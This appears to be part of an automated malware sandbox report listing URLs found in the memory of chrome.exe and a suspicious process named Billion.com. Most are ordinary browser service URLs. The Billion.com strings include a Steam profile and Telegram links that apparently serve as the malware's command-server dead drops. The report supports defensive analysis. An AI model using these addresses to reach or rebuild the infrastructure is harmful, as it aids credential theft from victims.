                Source: chrome.exe, 00000012.00000002.2811350010.000027800080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2811255241.00002780007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810055623.00002780004DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812984073.0000278000C97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2809890970.0000278000488000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000012.00000002.2811153144.0000278000780000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2816785979.0000278000FEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810110703.000027800050C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2809890970.0000278000488000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000012.00000002.2811153144.0000278000780000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2816785979.0000278000FEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810110703.000027800050C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
                Source: manifest.json.27.drString found in binary or memory: https://drive-autopush.corp.google.com/
                Source: manifest.json.27.drString found in binary or memory: https://drive-daily-0.corp.google.com/
                Source: chrome.exe, 00000012.00000002.2809431183.0000278000374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-1.corp.google.c
                Source: manifest.json.27.drString found in binary or memory: https://drive-daily-1.corp.google.com/
                Source: manifest.json.27.drString found in binary or memory: https://drive-daily-2.corp.google.com/
                Source: chrome.exe, 00000012.00000002.2809431183.0000278000374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.googl
                Source: chrome.exe, 00000012.00000002.2809431183.0000278000374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.googlP7
                Source: manifest.json.27.drString found in binary or memory: https://drive-daily-3.corp.google.com/
                Source: manifest.json.27.drString found in binary or memory: https://drive-daily-4.corp.google.com/
                Source: manifest.json.27.drString found in binary or memory: https://drive-daily-5.corp.google.com/
                Source: manifest.json.27.drString found in binary or memory: https://drive-daily-6.corp.google.com/
                Source: manifest.json.27.drString found in binary or memory: https://drive-preprod.corp.google.com/
                Source: manifest.json.27.drString found in binary or memory: https://drive-staging.corp.google.com/
                Source: chrome.exe, 00000012.00000003.2739029225.0000278000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
                Source: manifest.json.27.drString found in binary or memory: https://drive.google.com/
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
                Source: chrome.exe, 00000012.00000002.2809376618.0000278000358000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2735151718.0000278000358000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732621548.0000278000358000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2739029225.0000278000358000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2736735650.0000278000358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000012.00000002.2811895050.00002780009C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812775099.0000278000C5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                Source: chrome.exe, 00000012.00000002.2811895050.00002780009C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=searchTerms
                Source: chrome.exe, 00000012.00000003.2785855672.0000278000C2C000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, 16PP89.12.dr, 58YU37.12.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Billion.com, 0000000C.00000002.3328091669.000000000437A000.00000004.00000800.00020000.00000000.sdmp, Billion.com, 0000000C.00000002.3331378130.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812775099.0000278000C5C000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, 16PP89.12.dr, 58YU37.12.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: chrome.exe, 00000012.00000002.2812775099.0000278000C5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
                Source: Billion.com, 0000000C.00000002.3328091669.000000000437A000.00000004.00000800.00020000.00000000.sdmp, Billion.com, 0000000C.00000002.3331378130.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, 16PP89.12.dr, 58YU37.12.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: chrome.exe, 00000012.00000002.2812775099.0000278000C5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/chrome_newtabi
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.dr, HubApps Icons.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.dr, HubApps Icons.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.dr, HubApps Icons.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
                Source: chrome.exe, 00000012.00000003.2769573535.00002780014F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2796338915.000000440078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
                Source: chrome.exe, 00000012.00000003.2717396874.000000440039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2717142426.0000004400390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
                Source: chrome.exe, 00000012.00000003.2769525973.00002780014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769597201.00002780014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769573535.00002780014F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Ch
                Source: chrome.exe, 00000012.00000003.2769525973.00002780014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769597201.00002780014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769573535.00002780014F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Fh
                Source: chrome.exe, 00000012.00000003.2769525973.00002780014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769597201.00002780014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769573535.00002780014F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Kj
                Source: chrome.exe, 00000012.00000002.2811895050.00002780009E3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812014272.0000278000A24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
                Source: chrome.exe, 00000012.00000003.2739165122.000027800113C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2739266755.000027800120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2739029225.0000278000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
                Source: chrome.exe, 00000012.00000002.2812014272.0000278000A24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
                Source: chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
                Source: chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
                Source: chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                Source: chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
                Source: chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                Source: chrome.exe, 00000012.00000002.2808511544.000027800009C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
                Source: chrome.exe, 00000012.00000002.2808543530.00002780000B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
                Source: chrome.exe, 00000012.00000002.2808984785.00002780001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
                Source: chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
                Source: chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
                Source: chrome.exe, 00000012.00000002.2811350010.000027800080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2811255241.00002780007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810055623.00002780004DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812065716.0000278000A50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000012.00000002.2811350010.000027800080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2811255241.00002780007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810055623.00002780004DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812065716.0000278000A50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
                Source: chrome.exe, 00000012.00000002.2810228742.0000278000561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
                Source: chrome.exe, 00000012.00000002.2809863625.0000278000478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
                Source: Billion.com, 0000000C.00000002.3329936932.0000000004391000.00000040.00001000.00020000.00000000.sdmp, Billion.com, 0000000C.00000003.2541281715.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, Billion.com, 0000000C.00000003.2540896451.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, Billion.com, 0000000C.00000003.2540939282.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, Billion.com, 0000000C.00000002.3327789976.0000000004110000.00000004.00000800.00020000.00000000.sdmp, Billion.com, 0000000C.00000003.2541052285.0000000004391000.00000004.00000800.00020000.00000000.sdmp, Billion.com, 0000000C.00000002.3327625585.0000000004090000.00000004.00000800.00020000.00000000.sdmp, Billion.com, 0000000C.00000002.3326463584.0000000000EF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512
                Source: Billion.com, 0000000C.00000002.3326463584.0000000000EF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0
                Source: Billion.com, 0000000C.00000002.3333594942.0000000006303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Billion.com, 0000000C.00000002.3333594942.0000000006303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Billion.com, 0000000C.00000003.2540745906.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, Billion.com, 0000000C.00000003.2541000728.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, Billion.com, 0000000C.00000003.2540939282.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, Billion.com, 0000000C.00000003.2540769406.0000000004128000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.m
                Source: Billion.com, 0000000C.00000002.3326082408.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                Source: Billion.com, 0000000C.00000002.3326082408.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/DW
                Source: Billion.com, 0000000C.00000003.2540745906.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, Billion.com, 0000000C.00000003.2541000728.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, Billion.com, 0000000C.00000003.2540939282.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, Billion.com, 0000000C.00000003.2540769406.0000000004128000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04
                Source: Billion.com, 0000000C.00000002.3326463584.0000000000EF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04ael
                Source: Billion.com, 0000000C.00000002.3327789976.000000000413C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04aelm
                Source: Billion.com, 0000000C.00000002.3326463584.0000000000EF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04aelm0nk3Mozilla/5.0
                Source: Billion.com, 0000000C.00000002.3327789976.000000000413C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04aels
                Source: Billion.com, 0000000C.00000002.3328091669.00000000042DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04aelt
                Source: chrome.exe, 00000012.00000002.2812065716.0000278000A50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t0.gstatic.com/faviconV2
                Source: chrome.exe, 00000012.00000002.2808984785.00002780001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
                Source: Billion.com, 0000000C.00000002.3329936932.00000000043DD000.00000040.00001000.00020000.00000000.sdmp, Billion.com, 0000000C.00000002.3326463584.0000000000EF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                Source: Billion.com, 0000000C.00000002.3328091669.00000000042DD000.00000004.00000800.00020000.00000000.sdmp, Billion.com, 0000000C.00000002.3331378130.0000000006194000.00000004.00000800.00020000.00000000.sdmp, HDJEU3.12.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                Source: Billion.com, 0000000C.00000002.3328091669.000000000437A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, 16PP89.12.drString found in binary or memory: https://www.ecosia.org/newtab/
                Source: chrome.exe, 00000012.00000003.2739003701.0000278000C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812647167.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2759214939.0000278000C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2776245551.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2735408123.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2785855672.0000278000C2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
                Source: chrome.exe, 00000012.00000003.2739003701.0000278000C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812647167.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2759214939.0000278000C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2776245551.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2735408123.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2785855672.0000278000C2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
                Source: chrome.exe, 00000012.00000003.2739003701.0000278000C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812647167.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2759214939.0000278000C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2776245551.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2735408123.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2785855672.0000278000C2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
                Source: chrome.exe, 00000012.00000003.2756652980.00002780002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
                Source: chrome.exe, 00000012.00000002.2810228742.0000278000561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
                Source: chrome.exe, 00000012.00000002.2810228742.0000278000561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: chrome.exe, 00000012.00000003.2722102002.00002780004C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810403378.00002780005E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                Source: chrome.exe, 00000012.00000002.2811380536.000027800081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/Char
                Source: chrome.exe, 00000012.00000002.2812984073.0000278000C97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
                Source: chrome.exe, 00000012.00000002.2816620216.0000278000FC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/newtab_promos
                Source: content.js.27.dr, content_new.js.27.drString found in binary or memory: https://www.google.com/chrome
                Source: chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
                Source: chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
                Source: chrome.exe, 00000012.00000002.2811380536.000027800081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2808984785.00002780001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2813807994.0000278000D5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2811819315.0000278000984000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/
                Source: chrome.exe, 00000012.00000002.2811380536.000027800081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2808984785.00002780001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2813807994.0000278000D5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2811819315.0000278000984000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/gs
                Source: chrome.exe, 00000012.00000002.2810110703.000027800050C000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, 16PP89.12.dr, 58YU37.12.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: chrome.exe, 00000012.00000002.2811153144.0000278000780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoenterInsights
                Source: chrome.exe, 00000012.00000002.2809863625.0000278000478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
